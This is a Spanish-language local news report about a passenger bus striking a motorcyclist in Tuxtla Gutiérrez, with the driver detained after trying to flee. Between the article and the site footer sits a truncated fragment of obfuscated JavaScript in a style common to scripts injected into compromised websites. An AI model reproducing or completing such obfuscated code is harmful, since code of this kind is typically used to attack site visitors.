Camión de Rápidos del Sur atropelló a motociclista

Jairo Camacho.

Agencia ReporteCiudano, 24 de octubre del 2024. Tuxtla Gutiérrez. – Este jueves un motociclista fue atropellado por un camión de pasajeros de la línea Rápidos del Sur, cuando circulaba sobre el Bulevar Belisario Domínguez y Crucero del Bulevar Ciro Farrera.

Los reportes de tránsito informaron que, la moto circulaba de Sur a Norte, con el semáforo en verde cuando fue impactado por el camión de pasajeros.

Por el golpe el motociclista salió volando se estrelló contra el pavimento y terminó con una presunta fractura en el brazo izquierdo.

El conductor de la unidad trató de darse a la fuga pero fue detenido metros más adelante.

El herido fue llevado al hospital Gilberto Gómez Maza para su atención médica especializada.

Las dos unidades fueron puestas a disposición del Ministerio Público para deslindar responsabilidades.

(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return

About Agencias Reporte Ciudadano Chiapas

Check Also

Particular embiste a motociclista en la Calzada Samuel León Brindis

Jairo Camacho. Agencia ReporteCiudadano, 15 de diciembre del 2025. Tuxtla Gutiérrez.- Este viernes un motociclista …

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *